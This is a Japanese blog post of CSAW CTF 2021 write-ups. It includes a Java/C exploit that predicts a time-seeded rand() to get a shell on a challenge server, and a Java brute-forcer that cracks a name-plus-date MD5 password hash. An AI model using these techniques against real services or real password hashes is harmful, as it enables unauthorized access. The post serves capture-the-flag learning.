2021年9月13日月曜日

CSAW CTF 2021 Writeups(大したの解いてない)

CSAW CTF自体が大したことないというのは置いといて、

pwn haySTACK

$ nc pwn.chal.csaw.io 5002

すると、以下出力

Help! I have lost my favorite needle in one of my 4096 identical haystacks!

Unfortunately, I can't remember which one. Can you help me??

Which haystack do you want to check?

 バイナリをダウンロードしてBinaryNinjaで見てみたら、srand(time(null))した直後のrand()の戻り値を0x100000で割った余りと、入力値が一致したら/bin/shを動かすようになっていた。

なので、こちらもCで srand(time(null)); rand()した結果を送信して、その後lsとcat flag.txtを送信した。

$ nc -c "java B" pwn.chal.csaw.io 5002

210355

Help! I have lost my favorite needle in one of my 4096 identical haystacks!

Unfortunately, I can't remember which one. Can you help me??

Which haystack do you want to check?

210355

Hey you found a needle! And its number is 0x00001337! That's it!

flag.txt

haySTACK

flag{4lw4YS_r3m3mB3R_2_ch3CK_UR_st4cks}

-----

a.c
#include <stdlib.h>
#include <stdio.h>
#include <time.h>

int main(int argc, char *argv[]) {
  int a;
  srand(time(NULL));
  a = rand() % 0x100000;
  printf("%d\n", a);
}

B.java
import java.io.*;

public class B {

  public static void main(String args[]) {
    InputStreamReader isr = null;
    BufferedReader br = null;
    try {
      isr = new InputStreamReader(System.in, "UTF-8");
      br = new BufferedReader(isr);
      String line = null;
      String ans = guess();
      System.err.println(ans);
      for (int i = 0; i < 4; i++) {
        line = wait_line(br, "Which haystack do", null);
        System.out.println(ans);
        System.err.println(ans);
        line = wait_line(br, "Hey you", "Hey, you");
        if (line.startsWith("Hey you")) {
          System.out.println("ls");
          System.out.println("cat flag.txt");
          wait_line(br, "flag", null);
        } else {
          ans = guess();
          System.err.println(ans);
        }
      }
    } catch (Exception ex) {
      ex.printStackTrace();
    }
  }

  public static String wait_line(BufferedReader br, String q1, String q2)
    throws IOException {
    String line = null;
    while (true) {
      line = br.readLine();
      System.err.println(line);
      if (q1 != null && line.startsWith(q1))
        return line;
      if (q2 != null && line.startsWith(q2))
        return line;
    }
  }

  public static String guess() {
    try {
      Runtime rt = Runtime.getRuntime();
      Process p = rt.exec("./a");
      InputStream ism = p.getInputStream();
      InputStreamReader reader = new InputStreamReader(ism, "UTF-8");
      BufferedReader br = new BufferedReader(reader);
      return br.readLine();
    } catch (IOException ex) {
      ex.printStackTrace();
    }
    return null;
  }
}

-----


misc Weak Password
問題文はこう

Can you crack Aaron’s password hash? He seems to like simple passwords. I’m sure he’ll use his name and birthday in it. Hint: Aaron writes important dates as YYYYMMDD rather than YYYY-MM-DD or any other special character separator. Once you crack the password, prepend it with flag{ and append it with } to submit the flag with our standard format. Hash: 7f4986da7d7b52fa81f98278e6ec9dcb.

名前と日付くっつけてmd5してhashが一致すればおk。

最初現在日付からDateクラスなりCalendarクラスで1日ずつ過去にしてループしようと思ったけど、別に無効な日付で試しても問題ないので、2021年からhash一致するまで、月は12-1、日は31-1の3重ループにした。

$ java A

    :

Aaron19800323 286a6af3577736c8188403159f382fd8

Aaron19800322 0e5c5b6afda26100e4bcc8e0d8135714

Aaron19800321 7f4986da7d7b52fa81f98278e6ec9dcb

-----

A.java
import java.security.MessageDigest;

public class A {
  public static void main(String args[]) {
    try {
      MessageDigest md = MessageDigest.getInstance("MD5");
      for (int y = 2021; y > 0; y--) {
        String yyyy = String.format("%04d", y);
        for (int m = 12; m > 0; m--) {
          String mm = String.format("%02d", m);
          for (int d = 31; d > 0; d--) {
            String dd = String.format("%02d", d);
            String pass = "Aaron" + yyyy + mm + dd;
            byte[] result = md.digest(pass.getBytes());
            String md5 = String.format("%032x",
              new BigInteger(1, result));
            System.out.println(pass + " " + md5);
            if (md5.equals("7f4986da7d7b52fa81f98278e6ec9dcb"))
              System.exit(0);
          }
        }
      }
    } catch (Exception ex) {
      ex.printStackTrace();
    }
  }
}

-----